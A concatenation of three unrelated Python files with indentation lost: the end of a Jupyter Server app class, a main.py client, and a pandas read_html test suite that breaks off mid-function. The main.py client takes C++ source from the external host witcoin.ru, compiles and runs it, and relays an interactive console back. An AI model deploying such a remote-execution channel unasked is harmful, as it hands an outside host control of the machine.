The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext(
"Shutting down %d kernel", "Shutting down %d kernels", n_kernels
)
self.log.info(kernel_msg % n_kernels)
await run_sync_in_loop(self.kernel_manager.shutdown_all())
async def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings["terminal_manager"]
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext(
"Shutting down %d terminal", "Shutting down %d terminals", n_terminals
)
self.log.info(terminal_msg % n_terminals)
await run_sync_in_loop(terminal_manager.terminate_all())
async def cleanup_extensions(self):
"""Call shutdown hooks in all extensions."""
n_extensions = len(self.extension_manager.extension_apps)
extension_msg = trans.ngettext(
"Shutting down %d extension", "Shutting down %d extensions", n_extensions
)
self.log.info(extension_msg % n_extensions)
await run_sync_in_loop(self.extension_manager.stop_all_extensions())
def running_server_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _i18n(
"Jupyter Server {version} is running at:\n{url}".format(
version=ServerApp.version, url=self.display_url
)
)
if self.gateway_config.gateway_enabled:
info += (
_i18n("\nKernels will be managed by the Gateway server running at:\n%s")
% self.gateway_config.url
)
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {
"url": self.connection_url,
"hostname": self.ip if self.ip else "localhost",
"port": self.port,
"sock": self.sock,
"secure": bool(self.certfile),
"base_url": self.base_url,
"token": self.token,
"root_dir": os.path.abspath(self.root_dir),
"password": bool(self.password),
"pid": os.getpid(),
"version": ServerApp.version,
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with secure_write(self.info_file) as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_i18n("Failed to write server-info to %s: %s"), self.info_file, e)
def remove_server_info_file(self):
"""Remove the jpserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def _resolve_file_to_run_and_root_dir(self):
"""Returns a relative path from file_to_run
to root_dir. If root_dir and file_to_run
are incompatible, i.e. on different subtrees,
crash the app and log a critical message. Note
that if root_dir is not configured and file_to_run
is configured, root_dir will be set to the parent
directory of file_to_run.
"""
rootdir_abspath = pathlib.Path(self.root_dir).resolve()
file_rawpath = pathlib.Path(self.file_to_run)
combined_path = (rootdir_abspath / file_rawpath).resolve()
is_child = str(combined_path).startswith(str(rootdir_abspath))
if is_child:
if combined_path.parent != rootdir_abspath:
self.log.debug(
"The `root_dir` trait is set to a directory that's not "
"the immediate parent directory of `file_to_run`. Note that "
"the server will start at `root_dir` and open the "
"the file from the relative path to the `root_dir`."
)
return str(combined_path.relative_to(rootdir_abspath))
self.log.critical(
"`root_dir` and `file_to_run` are incompatible. They "
"don't share the same subtrees. Make sure `file_to_run` "
"is on the same path as `root_dir`."
)
self.exit(1)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {"token": self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings["jinja2_env"]
template = jinja2_env.get_template("browser-open.html")
fh.write(template.render(open_url=url, base_url=self.base_url))
def write_browser_open_files(self):
"""Write an `browser_open_file` and `browser_open_file_to_run` files
This can be used to open a file directly in a browser.
"""
# default_url contains base_url, but so does connection_url
self.write_browser_open_file()
# Create a second browser open file if
# file_to_run is set.
if self.file_to_run:
# Make sure file_to_run and root_dir are compatible.
file_to_run_relpath = self._resolve_file_to_run_and_root_dir()
file_open_url = url_escape(
url_path_join(self.file_url_prefix, *file_to_run_relpath.split(os.sep))
)
with open(self.browser_open_file_to_run, "w", encoding="utf-8") as f:
self._write_browser_open_file(file_open_url, f)
def write_browser_open_file(self):
"""Write an jpserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url) :]
with open(self.browser_open_file, "w", encoding="utf-8") as f:
self._write_browser_open_file(open_url, f)
def remove_browser_open_files(self):
"""Remove the `browser_open_file` and `browser_open_file_to_run` files
created for this server.
Ignores the error raised when the file has already been removed.
"""
self.remove_browser_open_file()
try:
os.unlink(self.browser_open_file_to_run)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def remove_browser_open_file(self):
"""Remove the jpserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def _prepare_browser_open(self):
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url) :]
if self.token:
uri = url_concat(uri, {"token": self.token})
if self.file_to_run:
# Create a separate, temporary open-browser-file
# pointing at a specific file.
open_file = self.browser_open_file_to_run
else:
# otherwise, just return the usual open browser file.
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin("file:", pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
return assembled_url, open_file
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_i18n("No web browser found: %s.") % e)
browser = None
if not browser:
return
assembled_url, _ = self._prepare_browser_open()
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start_app(self):
super(ServerApp, self).start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(
_i18n("Running as root is not recommended. Use --allow-root to bypass.")
)
self.exit(1)
info = self.log.info
for line in self.running_server_info(kernel_count=False).split("\n"):
info(line)
info(
_i18n(
"Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."
)
)
if "dev" in __version__:
info(
_i18n(
"Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
" resources section at https://jupyter.org/community.html."
)
)
self.write_server_info_file()
self.write_browser_open_files()
# Handle the browser opening.
if self.open_browser and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical(
"\n".join(
[
"\n",
"Jupyter Server is listening on %s" % self.display_url,
"",
(
"UNIX sockets are not browser-connectable, but you can tunnel to "
"the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then "
"open e.g. %s in a browser."
)
% (self.sock, self.connection_url),
]
)
)
else:
self.log.critical(
"\n".join(
[
"\n",
"To access the server, open this file in a browser:",
" %s" % urljoin("file:", pathname2url(self.browser_open_file)),
"Or copy and paste one of these URLs:",
" %s" % self.display_url,
]
)
)
async def _cleanup(self):
"""General cleanup of files, extensions and kernels created
by this instance ServerApp.
"""
self.remove_server_info_file()
self.remove_browser_open_files()
await self.cleanup_extensions()
await self.cleanup_kernels()
await self.cleanup_terminals()
def start_ioloop(self):
"""Start the IO Loop."""
if sys.platform.startswith("win"):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda: None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
self.log.info(_i18n("Interrupted..."))
def init_ioloop(self):
"""init self.io_loop so that an extension can use it by io_loop.call_later() to create background tasks"""
self.io_loop = ioloop.IOLoop.current()
def start(self):
"""Start the Jupyter server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
self.start_app()
self.start_ioloop()
async def _stop(self):
"""Cleanup resources and stop the IO Loop."""
await self._cleanup()
self.io_loop.stop()
def stop(self, from_signal=False):
"""Cleanup resources and stop the server."""
if hasattr(self, "_http_server"):
# Stop a server if its set.
self.http_server.stop()
if getattr(self, "io_loop", None):
# use IOLoop.add_callback because signal.signal must be called
# from main thread
if from_signal:
self.io_loop.add_callback_from_signal(self._stop)
else:
self.io_loop.add_callback(self._stop)
def list_running_servers(runtime_dir=None, log=None):
"""Iterate over the server info files of running Jupyter servers.
Given a runtime directory, find jpserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running Jupyter server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match("jpserver-(.+).json", file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding="utf-8") as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ("pid" in info) and check_pid(info["pid"]):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError as e:
if log:
log.warning(_i18n("Deleting server info file failed: %s.") % e)
# -----------------------------------------------------------------------------
# Main entry point
# -----------------------------------------------------------------------------
main = launch_new_instance = ServerApp.launch_instance
|
main.py | import socketIO_client
import time
import threading
import os
import pty
import subprocess
io = socketIO_client.SocketIO('witcoin.ru', 4000)
io.emit('auth', 'test3')
master, slave = pty.openpty()
if not os.path.exists('tmp'):
os.mkdir('tmp')
videoPipeName = 'tmp/video.avi'
if not os.path.exists(videoPipeName):
os.mkfifo(videoPipeName)
def send_video():
video_in = os.open(videoPipeName, os.O_RDONLY)
while True:
data = os.read(video_in, 10000)
if len(data):
io.emit('video.data', bytearray(data))
threading.Thread(target=send_video).start()
def send_console():
while True:
data = os.read(master, 10000)
if len(data):
io.emit('console', data.decode('utf-8'))
threading.Thread(target=send_console).start()
def receive_console(data):
os.write(master, data.encode('utf-8'))
io.on('console', receive_console)
def receive_source_code(data):
io.emit('console.clear')
f = open('tmp/source.cpp', 'w')
f.write(data)
f.close()
io.emit('console', 'Source code received, generate object file\r\n')
completed_process = subprocess.run(
'g++ -c source.cpp -o object.o --std=c++11',
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd='./tmp'
)
io.emit('console', completed_process.stdout.decode('utf-8') + completed_process.stderr.decode('utf-8'))
if completed_process.returncode == 0:
io.emit('console', 'Object file generated, linking\r\n')
else:
io.emit('console', 'Errors have occurred, stop\r\n')
exit()
completed_process = subprocess.run(
'g++ -o executable object.o -lopencv_core -lopencv_highgui',
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd='./tmp'
)
io.emit('console', completed_process.stdout.decode('utf-8') + completed_process.stderr.decode('utf-8'))
if completed_process.returncode == 0:
io.emit('console', 'Linked successful\r\n')
else:
io.emit('console', 'Errors have occurred, stop\r\n')
exit()
io.emit('video.init')
io.emit('console', '\r\n')
completed_process = subprocess.run('./executable', stdin=slave, stdout=slave, stderr=slave, cwd='./tmp')
io.emit('console', '\r\n\r\nProgram exit with code {}\r\n'.format(completed_process.returncode))
time.sleep(5)
io.emit('video.end')
io.on('source-code', receive_source_code)
io.wait()
|
test_html.py | from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
